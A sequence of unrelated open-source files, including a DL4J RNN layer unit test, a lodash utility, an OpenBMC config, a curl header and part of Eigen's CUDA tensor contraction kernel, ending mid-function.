fileFormatVersion: 2
guid: a77fe3ce6ce59e8459c5f0d7c6011d99
MonoImporter:
  externalObjects: {}
  serializedVersion: 2
  defaultReferences: []
  executionOrder: 0
  icon: {fileID: 2800000, guid: 424715533f7464745a37e0bacd374d56, type: 3}
  userData:
  assetBundleName:
  assetBundleVariant:
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2015-2018 Skymind, Inc.
*
* This program and the accompanying materials are made available under the
* terms of the Apache License, Version 2.0 which is available at
* https://www.apache.org/licenses/LICENSE-2.0.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* SPDX-License-Identifier: Apache-2.0
******************************************************************************/
package org.deeplearning4j.nn.layers.recurrent;
import org.deeplearning4j.BaseDL4JTest;
import org.deeplearning4j.TestUtils;
import org.deeplearning4j.nn.api.Layer;
import org.deeplearning4j.nn.conf.ComputationGraphConfiguration;
import org.deeplearning4j.nn.conf.NeuralNetConfiguration;
import org.deeplearning4j.nn.conf.RNNFormat;
import org.deeplearning4j.nn.conf.inputs.InputType;
import org.deeplearning4j.nn.conf.layers.DenseLayer;
import org.deeplearning4j.nn.conf.layers.LSTM;
import org.deeplearning4j.nn.conf.layers.OutputLayer;
import org.deeplearning4j.nn.conf.layers.recurrent.LastTimeStep;
import org.deeplearning4j.nn.conf.layers.recurrent.SimpleRnn;
import org.deeplearning4j.nn.graph.ComputationGraph;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.nd4j.linalg.api.ndarray.INDArray;
import org.nd4j.linalg.factory.Nd4j;
import org.nd4j.linalg.indexing.NDArrayIndex;
import org.deeplearning4j.nn.workspace.LayerWorkspaceMgr;
import org.nd4j.linalg.learning.config.AdaGrad;
import static org.deeplearning4j.nn.api.OptimizationAlgorithm.STOCHASTIC_GRADIENT_DESCENT;
import static org.deeplearning4j.nn.weights.WeightInit.XAVIER_UNIFORM;
import static org.junit.Assert.*;
import static org.nd4j.linalg.activations.Activation.IDENTITY;
import static org.nd4j.linalg.activations.Activation.TANH;
import static org.nd4j.linalg.lossfunctions.LossFunctions.LossFunction.MSE;
@RunWith(Parameterized.class)
public class TestLastTimeStepLayer extends BaseDL4JTest {
private RNNFormat rnnDataFormat;
public TestLastTimeStepLayer(RNNFormat rnnDataFormat){
this.rnnDataFormat = rnnDataFormat;
}
@Parameterized.Parameters(name="{0}")
public static Object[] params(){
return RNNFormat.values();
}
@Test
public void testLastTimeStepVertex() {
ComputationGraphConfiguration conf = new NeuralNetConfiguration.Builder().graphBuilder().addInputs("in")
.addLayer("lastTS", new LastTimeStep(new SimpleRnn.Builder()
.nIn(5).nOut(6).dataFormat(rnnDataFormat).build()), "in")
.setOutputs("lastTS")
.build();
ComputationGraph graph = new ComputationGraph(conf);
graph.init();
//First: test without input mask array
Nd4j.getRandom().setSeed(12345);
Layer l = graph.getLayer("lastTS");
INDArray in;
if (rnnDataFormat == RNNFormat.NCW){
in = Nd4j.rand(3, 5, 6);
}
else{
in = Nd4j.rand(3, 6, 5);
}
INDArray outUnderlying = ((LastTimeStepLayer)l).getUnderlying().activate(in, false, LayerWorkspaceMgr.noWorkspaces());
INDArray expOut;
if (rnnDataFormat == RNNFormat.NCW){
expOut = outUnderlying.get(NDArrayIndex.all(), NDArrayIndex.all(), NDArrayIndex.point(5));
}
else{
expOut = outUnderlying.get(NDArrayIndex.all(), NDArrayIndex.point(5), NDArrayIndex.all());
}
//Forward pass:
INDArray outFwd = l.activate(in, false, LayerWorkspaceMgr.noWorkspaces());
assertEquals(expOut, outFwd);
//Second: test with input mask array
INDArray inMask = Nd4j.zeros(3, 6);
inMask.putRow(0, Nd4j.create(new double[]{1, 1, 1, 0, 0, 0}));
inMask.putRow(1, Nd4j.create(new double[]{1, 1, 1, 1, 0, 0}));
inMask.putRow(2, Nd4j.create(new double[]{1, 1, 1, 1, 1, 0}));
graph.setLayerMaskArrays(new INDArray[]{inMask}, null);
expOut = Nd4j.zeros(3, 6);
if (rnnDataFormat == RNNFormat.NCW){
expOut.putRow(0, outUnderlying.get(NDArrayIndex.point(0), NDArrayIndex.all(), NDArrayIndex.point(2)));
expOut.putRow(1, outUnderlying.get(NDArrayIndex.point(1), NDArrayIndex.all(), NDArrayIndex.point(3)));
expOut.putRow(2, outUnderlying.get(NDArrayIndex.point(2), NDArrayIndex.all(), NDArrayIndex.point(4)));
}
else{
expOut.putRow(0, outUnderlying.get(NDArrayIndex.point(0), NDArrayIndex.point(2), NDArrayIndex.all()));
expOut.putRow(1, outUnderlying.get(NDArrayIndex.point(1), NDArrayIndex.point(3), NDArrayIndex.all()));
expOut.putRow(2, outUnderlying.get(NDArrayIndex.point(2), NDArrayIndex.point(4), NDArrayIndex.all()));
}
outFwd = l.activate(in, false, LayerWorkspaceMgr.noWorkspaces());
assertEquals(expOut, outFwd);
TestUtils.testModelSerialization(graph);
}
@Test
public void testMaskingAndAllMasked(){
ComputationGraphConfiguration.GraphBuilder builder = new NeuralNetConfiguration.Builder()
.optimizationAlgo(STOCHASTIC_GRADIENT_DESCENT)
.weightInit(XAVIER_UNIFORM)
.activation(TANH)
.updater(new AdaGrad(0.01))
.l2(0.0001)
.seed(1234)
.graphBuilder()
.addInputs("in")
.setInputTypes(InputType.recurrent(1, rnnDataFormat))
.addLayer("RNN", new LastTimeStep(new LSTM.Builder()
.nOut(10).dataFormat(rnnDataFormat)
.build()), "in")
.addLayer("dense", new DenseLayer.Builder()
.nOut(10)
.build(), "RNN")
.addLayer("out", new OutputLayer.Builder()
.activation(IDENTITY)
.lossFunction(MSE)
.nOut(10)
.build(), "dense")
.setOutputs("out");
ComputationGraphConfiguration conf = builder.build();
ComputationGraph cg = new ComputationGraph(conf);
cg.init();
INDArray f = Nd4j.rand(new long[]{1,1,24});
INDArray fm1 = Nd4j.ones(1,24);
INDArray fm2 = Nd4j.zeros(1,24);
INDArray fm3 = Nd4j.zeros(1,24);
fm3.get(NDArrayIndex.point(0), NDArrayIndex.interval(0,5)).assign(1);
if (rnnDataFormat == RNNFormat.NWC){
f = f.permute(0, 2, 1);
}
INDArray[] out1 = cg.output(false, new INDArray[]{f}, new INDArray[]{fm1});
try {
cg.output(false, new INDArray[]{f}, new INDArray[]{fm2});
fail("Expected exception");
} catch (Exception e){
assertTrue(e.getMessage().contains("mask is all 0s"));
}
INDArray[] out3 = cg.output(false, new INDArray[]{f}, new INDArray[]{fm3});
System.out.println(out1[0]);
System.out.println(out3[0]);
assertNotEquals(out1[0], out3[0]);
}
}
| {
"pile_set_name": "Github"
} |
INVENTORY=/system/chassis/motherboard/powersupply3
DEVPATH=/dev/input/by-path/platform-gpio-keys-event
KEY=147
NAME=powersupply3
DRIVERS=/sys/bus/i2c/drivers/ibm-cffps,3-006b
EXTRA_IFACES=xyz.openbmc_project.Inventory.Item.PowerSupply
| {
"pile_set_name": "Github"
} |
export enum SelectDateChangeReason {
date,
time,
button,
format,
custom
}
export interface SelectDateChangeEventArgs {
reason: SelectDateChangeReason;
selectedDate: Date;
}
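// Editorial sketch (not part of the original file): a hypothetical consumer
// of these types, showing how a date-picker host might branch on the change
// reason. The handler name and the branch taken are assumptions made purely
// for illustration.
function onSelectedDateChange(args: SelectDateChangeEventArgs): void {
  // React only to changes confirmed through the picker's button.
  if (args.reason === SelectDateChangeReason.button) {
    console.log(`Selected ${args.selectedDate.toISOString()}`);
  }
}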
| {
"pile_set_name": "Github"
} |
import arrayEvery from './_arrayEvery.js';
import createOver from './_createOver.js';
/**
* Creates a function that checks if **all** of the `predicates` return
* truthy when invoked with the arguments it receives.
*
* @static
* @memberOf _
* @since 4.0.0
* @category Util
* @param {...(Function|Function[])} [predicates=[_.identity]]
* The predicates to check.
* @returns {Function} Returns the new function.
* @example
*
* var func = _.overEvery([Boolean, isFinite]);
*
* func('1');
* // => true
*
* func(null);
* // => false
*
* func(NaN);
* // => false
*/
var overEvery = createOver(arrayEvery);
export default overEvery;
| {
"pile_set_name": "Github"
} |
//
// main.m
// GCDExample
//
// Created by Jeff Kelley on 2/18/11.
// Copyright 2011 Jeff Kelley. All rights reserved.
//
#import <UIKit/UIKit.h>
int main(int argc, char *argv[])
{
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
int retVal = UIApplicationMain(argc, argv, nil, nil);
[pool release];
return retVal;
}
| {
"pile_set_name": "Github"
} |
One.relative_identifier(
1 ^^^ 2,
key: 3 ^^^ 4
) ^^^ Two.relative_identifier(
2 ^^^ 1,
key: 4 ^^^ 3
)
One.relative_identifier(
1 ^^^ 2,
key: 3 ^^^ 4
)(
4 ^^^ 5,
key: 6 ^^^ 7
) ^^^ Two.relative_identifier(
2 ^^^ 1,
key: 4 ^^^ 3
)(
5 ^^^ 4,
key: 7 ^^^ 6
)
One.relative_identifier key: 1 ^^^ 2
One.relative_identifier unqualified 1 ^^^ 2,
key: 3 ^^^ 4
One.relative_identifier 1 ^^^ 2,
key: 3 ^^^ 4
| {
"pile_set_name": "Github"
} |
#ifndef HEADER_CURL_TFTP_H
#define HEADER_CURL_TFTP_H
/***************************************************************************
* _ _ ____ _
* Project ___| | | | _ \| |
* / __| | | | |_) | |
* | (__| |_| | _ <| |___
* \___|\___/|_| \_\_____|
*
* Copyright (C) 1998 - 2007, Daniel Stenberg, <[email protected]>, et al.
*
* This software is licensed as described in the file COPYING, which
* you should have received as part of this distribution. The terms
* are also available at http://curl.haxx.se/docs/copyright.html.
*
* You may opt to use, copy, modify, merge, publish, distribute and/or sell
* copies of the Software, and permit persons to whom the Software is
* furnished to do so, under the terms of the COPYING file.
*
* This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
* KIND, either express or implied.
*
***************************************************************************/
#ifndef CURL_DISABLE_TFTP
extern const struct Curl_handler Curl_handler_tftp;
#endif
#endif /* HEADER_CURL_TFTP_H */
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014-2015 Benoit Steiner <[email protected]>
// Copyright (C) 2015 Navdeep Jaitly <[email protected]>
// Copyright (C) 2014 Eric Martin <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_CXX11_TENSOR_TENSOR_CONTRACTION_CUDA_H
#define EIGEN_CXX11_TENSOR_TENSOR_CONTRACTION_CUDA_H
#if defined(EIGEN_USE_GPU) && defined(__CUDACC__)
namespace Eigen {
template<typename Scalar, typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper, bool needs_edge_check>
__device__ EIGEN_STRONG_INLINE void
EigenContractionKernelInternal(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output, Scalar* lhs_shmem, Scalar* rhs_shmem,
const Index m_size, const Index n_size, const Index k_size) {
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 64 * m_block_idx;
const Index base_n = 64 * n_block_idx;
// declare and initialize 64 registers for output 8x8 block
// prefetch registers
Scalar lhs_pf0;
Scalar lhs_pf1;
Scalar lhs_pf2;
Scalar lhs_pf3;
Scalar lhs_pf4;
Scalar lhs_pf5;
Scalar lhs_pf6;
Scalar lhs_pf7;
Scalar rhs_pf0;
Scalar rhs_pf1;
Scalar rhs_pf2;
Scalar rhs_pf3;
Scalar rhs_pf4;
Scalar rhs_pf5;
Scalar rhs_pf6;
Scalar rhs_pf7;
// shared memory is formatted
// (contract idx in block, nocontract idx in block, block idx)
// where block idx is column major. This transposition limits the number of
// bank conflicts when reading the LHS. The core idea is that since the contracting
// index is shared by both sides, then the contracting index should be in threadIdx.x.
// On the LHS, we pad each row inside of each block with an extra element. This makes
// each block 8 rows of 9 elements, which is 72 elements. This gives no bank conflicts
// on writes and very few 2-way conflicts on reads. There is an 8x8 grid of these blocks.
// On the RHS we just add 8 padding elements to the end of each block. This gives no bank
// conflicts on writes and also none on reads.
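// Editorial worked example (not in the original source): for thread
// (threadIdx.x, threadIdx.y, threadIdx.z) = (3, 2, 1), the base below is
// lhs_store_idx_base = 2*72 + 3*9 + 1 = 172, i.e. contract index 3 and
// nocontract index 1 within padded block 2; the 8 values each thread
// prefetches then land 576 = 8*72 elements apart.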
// storage indices
const Index lhs_store_idx_base = threadIdx.y * 72 + threadIdx.x * 9 + threadIdx.z;
const Index rhs_store_idx_base = threadIdx.y * 72 + threadIdx.z * 8 + threadIdx.x;
const Index lhs_store_idx_0 = lhs_store_idx_base + 576 * 0;
const Index lhs_store_idx_1 = lhs_store_idx_base + 576 * 1;
const Index lhs_store_idx_2 = lhs_store_idx_base + 576 * 2;
const Index lhs_store_idx_3 = lhs_store_idx_base + 576 * 3;
const Index lhs_store_idx_4 = lhs_store_idx_base + 576 * 4;
const Index lhs_store_idx_5 = lhs_store_idx_base + 576 * 5;
const Index lhs_store_idx_6 = lhs_store_idx_base + 576 * 6;
const Index lhs_store_idx_7 = lhs_store_idx_base + 576 * 7;
const Index rhs_store_idx_0 = rhs_store_idx_base + 576 * 0;
const Index rhs_store_idx_1 = rhs_store_idx_base + 576 * 1;
const Index rhs_store_idx_2 = rhs_store_idx_base + 576 * 2;
const Index rhs_store_idx_3 = rhs_store_idx_base + 576 * 3;
const Index rhs_store_idx_4 = rhs_store_idx_base + 576 * 4;
const Index rhs_store_idx_5 = rhs_store_idx_base + 576 * 5;
const Index rhs_store_idx_6 = rhs_store_idx_base + 576 * 6;
const Index rhs_store_idx_7 = rhs_store_idx_base + 576 * 7;
// in the loading code, the following variables are important:
// threadIdx.x: the vertical position in an 8x8 block
// threadIdx.y: the vertical index of the 8x8 block in the grid
// threadIdx.z: the horizontal position in an 8x8 block
// k: the horizontal index of the 8x8 block in the grid
//
// The k parameter is implicit (it was the loop counter for a loop that went
// from 0 to <8), but now that loop is unrolled in the code below.
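// For example (editorial note): load_idx_vert = threadIdx.x + 8*threadIdx.y
// below ranges over 0..63, so the 64 (x, y) pairs together cover one full
// 64-row stripe of the LHS starting at base_m, while threadIdx.z selects one
// of the 8 columns handled per unrolled step.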
const Index load_idx_vert = threadIdx.x + 8 * threadIdx.y;
const Index lhs_vert = base_m + load_idx_vert;
#define prefetchIntoRegisters(base_k) \
{ \
lhs_pf0 = conv(0); \
lhs_pf1 = conv(0); \
lhs_pf2 = conv(0); \
lhs_pf3 = conv(0); \
lhs_pf4 = conv(0); \
lhs_pf5 = conv(0); \
lhs_pf6 = conv(0); \
lhs_pf7 = conv(0); \
\
rhs_pf0 = conv(0); \
rhs_pf1 = conv(0); \
rhs_pf2 = conv(0); \
rhs_pf3 = conv(0); \
rhs_pf4 = conv(0); \
rhs_pf5 = conv(0); \
rhs_pf6 = conv(0); \
rhs_pf7 = conv(0); \
\
if (!needs_edge_check || lhs_vert < m_size) { \
const Index lhs_horiz_0 = base_k + threadIdx.z + 0 * 8; \
const Index lhs_horiz_1 = base_k + threadIdx.z + 1 * 8; \
const Index lhs_horiz_2 = base_k + threadIdx.z + 2 * 8; \
const Index lhs_horiz_3 = base_k + threadIdx.z + 3 * 8; \
const Index lhs_horiz_4 = base_k + threadIdx.z + 4 * 8; \
const Index lhs_horiz_5 = base_k + threadIdx.z + 5 * 8; \
const Index lhs_horiz_6 = base_k + threadIdx.z + 6 * 8; \
const Index lhs_horiz_7 = base_k + threadIdx.z + 7 * 8; \
\
if (!needs_edge_check || lhs_horiz_7 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
lhs_pf5 = lhs(lhs_vert, lhs_horiz_5); \
lhs_pf6 = lhs(lhs_vert, lhs_horiz_6); \
lhs_pf7 = lhs(lhs_vert, lhs_horiz_7); \
} else if (lhs_horiz_6 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
lhs_pf5 = lhs(lhs_vert, lhs_horiz_5); \
lhs_pf6 = lhs(lhs_vert, lhs_horiz_6); \
} else if (lhs_horiz_5 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
lhs_pf5 = lhs(lhs_vert, lhs_horiz_5); \
} else if (lhs_horiz_4 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
} else if (lhs_horiz_3 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
} else if (lhs_horiz_2 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
} else if (lhs_horiz_1 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
} else if (lhs_horiz_0 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
} \
} \
\
const Index rhs_vert = base_k + load_idx_vert; \
if (!needs_edge_check || rhs_vert < k_size) { \
const Index rhs_horiz_0 = base_n + threadIdx.z + 0 * 8; \
const Index rhs_horiz_1 = base_n + threadIdx.z + 1 * 8; \
const Index rhs_horiz_2 = base_n + threadIdx.z + 2 * 8; \
const Index rhs_horiz_3 = base_n + threadIdx.z + 3 * 8; \
const Index rhs_horiz_4 = base_n + threadIdx.z + 4 * 8; \
const Index rhs_horiz_5 = base_n + threadIdx.z + 5 * 8; \
const Index rhs_horiz_6 = base_n + threadIdx.z + 6 * 8; \
const Index rhs_horiz_7 = base_n + threadIdx.z + 7 * 8; \
\
if (rhs_horiz_7 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
rhs_pf5 = rhs(rhs_vert, rhs_horiz_5); \
rhs_pf6 = rhs(rhs_vert, rhs_horiz_6); \
rhs_pf7 = rhs(rhs_vert, rhs_horiz_7); \
} else if (rhs_horiz_6 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
rhs_pf5 = rhs(rhs_vert, rhs_horiz_5); \
rhs_pf6 = rhs(rhs_vert, rhs_horiz_6); \
} else if (rhs_horiz_5 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
rhs_pf5 = rhs(rhs_vert, rhs_horiz_5); \
} else if (rhs_horiz_4 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
} else if (rhs_horiz_3 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
} else if (rhs_horiz_2 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
} else if (rhs_horiz_1 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
} else if (rhs_horiz_0 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
} \
} \
}
#define writeRegToShmem(_) \
lhs_shmem[lhs_store_idx_0] = lhs_pf0; \
rhs_shmem[rhs_store_idx_0] = rhs_pf0; \
\
lhs_shmem[lhs_store_idx_1] = lhs_pf1; \
rhs_shmem[rhs_store_idx_1] = rhs_pf1; \
\
lhs_shmem[lhs_store_idx_2] = lhs_pf2; \
rhs_shmem[rhs_store_idx_2] = rhs_pf2; \
\
lhs_shmem[lhs_store_idx_3] = lhs_pf3; \
rhs_shmem[rhs_store_idx_3] = rhs_pf3; \
\
lhs_shmem[lhs_store_idx_4] = lhs_pf4; \
rhs_shmem[rhs_store_idx_4] = rhs_pf4; \
\
lhs_shmem[lhs_store_idx_5] = lhs_pf5; \
rhs_shmem[rhs_store_idx_5] = rhs_pf5; \
\
lhs_shmem[lhs_store_idx_6] = lhs_pf6; \
rhs_shmem[rhs_store_idx_6] = rhs_pf6; \
\
lhs_shmem[lhs_store_idx_7] = lhs_pf7; \
rhs_shmem[rhs_store_idx_7] = rhs_pf7;
// declare and initialize result array
#define res(i, j) _res_##i##j
#define initResultRow(i) \
Scalar res(i, 0) = conv(0); \
Scalar res(i, 1) = conv(0); \
Scalar res(i, 2) = conv(0); \
Scalar res(i, 3) = conv(0); \
Scalar res(i, 4) = conv(0); \
Scalar res(i, 5) = conv(0); \
Scalar res(i, 6) = conv(0); \
Scalar res(i, 7) = conv(0);
internal::scalar_cast_op<int, Scalar> conv;
initResultRow(0);
initResultRow(1);
initResultRow(2);
initResultRow(3);
initResultRow(4);
initResultRow(5);
initResultRow(6);
initResultRow(7);
#undef initResultRow
for (Index base_k = 0; base_k < k_size; base_k += 64) {
// wait for previous iteration to finish with shmem. Despite common sense,
// the code is a bit faster with this here than at the bottom of the loop
__syncthreads();
prefetchIntoRegisters(base_k);
writeRegToShmem();
#undef prefetchIntoRegisters
#undef writeRegToShmem
// wait for shared mem packing to be done before starting computation
__syncthreads();
// compute 8x8 matrix product by outer product. This involves packing one column
// of LHS and one row of RHS into registers (takes 16 registers).
#define lcol(i) _lcol##i
Scalar lcol(0);
Scalar lcol(1);
Scalar lcol(2);
Scalar lcol(3);
Scalar lcol(4);
Scalar lcol(5);
Scalar lcol(6);
Scalar lcol(7);
#define rrow(j) _rrow##j
Scalar rrow(0);
Scalar rrow(1);
Scalar rrow(2);
Scalar rrow(3);
Scalar rrow(4);
Scalar rrow(5);
Scalar rrow(6);
Scalar rrow(7);
// Now x corresponds to k, y to m, and z to n
const Scalar* lhs_block = &lhs_shmem[threadIdx.x + 9 * threadIdx.y];
const Scalar* rhs_block = &rhs_shmem[threadIdx.x + 8 * threadIdx.z];
#define lhs_element(i, j) lhs_block[72 * ((i) + 8 * (j))]
#define rhs_element(i, j) rhs_block[72 * ((i) + 8 * (j))]
#define loadData(i, j) \
lcol(0) = lhs_element(0, j); \
rrow(0) = rhs_element(i, 0); \
lcol(1) = lhs_element(1, j); \
rrow(1) = rhs_element(i, 1); \
lcol(2) = lhs_element(2, j); \
rrow(2) = rhs_element(i, 2); \
lcol(3) = lhs_element(3, j); \
rrow(3) = rhs_element(i, 3); \
lcol(4) = lhs_element(4, j); \
rrow(4) = rhs_element(i, 4); \
lcol(5) = lhs_element(5, j); \
rrow(5) = rhs_element(i, 5); \
lcol(6) = lhs_element(6, j); \
rrow(6) = rhs_element(i, 6); \
lcol(7) = lhs_element(7, j); \
rrow(7) = rhs_element(i, 7);
#define computeCol(j) \
res(0, j) += lcol(0) * rrow(j); \
res(1, j) += lcol(1) * rrow(j); \
res(2, j) += lcol(2) * rrow(j); \
res(3, j) += lcol(3) * rrow(j); \
res(4, j) += lcol(4) * rrow(j); \
res(5, j) += lcol(5) * rrow(j); \
res(6, j) += lcol(6) * rrow(j); \
res(7, j) += lcol(7) * rrow(j);
#define computePass(i) \
loadData(i, i); \
\
computeCol(0); \
computeCol(1); \
computeCol(2); \
computeCol(3); \
computeCol(4); \
computeCol(5); \
computeCol(6); \
computeCol(7);
computePass(0);
computePass(1);
computePass(2);
computePass(3);
computePass(4);
computePass(5);
computePass(6);
computePass(7);
#undef lcol
#undef rrow
#undef lhs_element
#undef rhs_element
#undef loadData
#undef computeCol
#undef computePass
} // end loop over k
// we've now iterated over all of the large (i.e. width 64) k blocks and
// accumulated results in registers. At this point thread (x, y, z) contains
// the sum across all big k blocks of the product of little k block of index (x, y)
// with block of index (y, z). To compute the final output, we need to reduce
// the 8 threads over y by summation.
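// Editorial note: the masks 1, 2 and 4 used below form a three-step
// __shfl_xor butterfly: after the step with mask m, each lane holds the sum
// of its own value and that of the lane whose id differs in bit m, so after
// all three steps every lane in each group of 8 holds the full 8-way sum.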
#define shuffleInc(i, j, mask) res(i, j) += __shfl_xor(res(i, j), mask)
#define reduceRow(i, mask) \
shuffleInc(i, 0, mask); \
shuffleInc(i, 1, mask); \
shuffleInc(i, 2, mask); \
shuffleInc(i, 3, mask); \
shuffleInc(i, 4, mask); \
shuffleInc(i, 5, mask); \
shuffleInc(i, 6, mask); \
shuffleInc(i, 7, mask);
#define reduceMatrix(mask) \
reduceRow(0, mask); \
reduceRow(1, mask); \
reduceRow(2, mask); \
reduceRow(3, mask); \
reduceRow(4, mask); \
reduceRow(5, mask); \
reduceRow(6, mask); \
reduceRow(7, mask);
// actually perform the reduction, now each thread of index (_, y, z)
// contains the correct values in its registers that belong in the output
// block
reduceMatrix(1);
reduceMatrix(2);
reduceMatrix(4);
#undef shuffleInc
#undef reduceRow
#undef reduceMatrix
// now we need to copy the 64 values into main memory. We can't split work
// among threads because all variables are in registers. There are 2 ways
// to do this:
// (1) have 1 thread do 64 writes from registers into global memory
// (2) have 1 thread do 64 writes into shared memory, and then 8 threads
// each do 8 writes into global memory. We can just overwrite the shared
// memory from the problem we just solved.
// (2) is slightly faster than (1) due to less branching and more ILP
// TODO: won't yield much gain, but could just use currently unused shared mem
// and then we won't have to sync
// wait for shared mem to be out of use
__syncthreads();
#define writeResultShmem(i, j) \
lhs_shmem[i + 8 * threadIdx.y + 64 * threadIdx.z + 512 * j] = res(i, j);
#define writeRow(i) \
writeResultShmem(i, 0); \
writeResultShmem(i, 1); \
writeResultShmem(i, 2); \
writeResultShmem(i, 3); \
writeResultShmem(i, 4); \
writeResultShmem(i, 5); \
writeResultShmem(i, 6); \
writeResultShmem(i, 7);
if (threadIdx.x == 0) {
writeRow(0);
writeRow(1);
writeRow(2);
writeRow(3);
writeRow(4);
writeRow(5);
writeRow(6);
writeRow(7);
}
#undef writeResultShmem
#undef writeRow
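// Editorial example for the bounds below: thread (x, y, z) writes output
// rows base_m + threadIdx.y + 8*threadIdx.x, so the count of valid x is
// ceil((m_size - base_m - threadIdx.y) / 8), computed as (... + 7) / 8 and
// clamped to 8. E.g. with m_size - base_m = 20 and threadIdx.y = 3:
// (20 - 3 + 7) / 8 = 3 valid writes, covering rows 3, 11 and 19.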
const int max_i_write = numext::mini((int)((m_size - base_m - threadIdx.y + 7) / 8), 8);
const int max_j_write = numext::mini((int)((n_size - base_n - threadIdx.z + 7) / 8), 8);
if (threadIdx.x < max_i_write) {
if (max_j_write == 8) {
// TODO: can I trade bank conflicts for coalesced writes?
Scalar val0 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 0];
Scalar val1 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 1];
Scalar val2 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 2];
Scalar val3 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 3];
Scalar val4 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 4];
Scalar val5 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 5];
Scalar val6 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 6];
Scalar val7 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 7];
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 0) = val0;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 1) = val1;
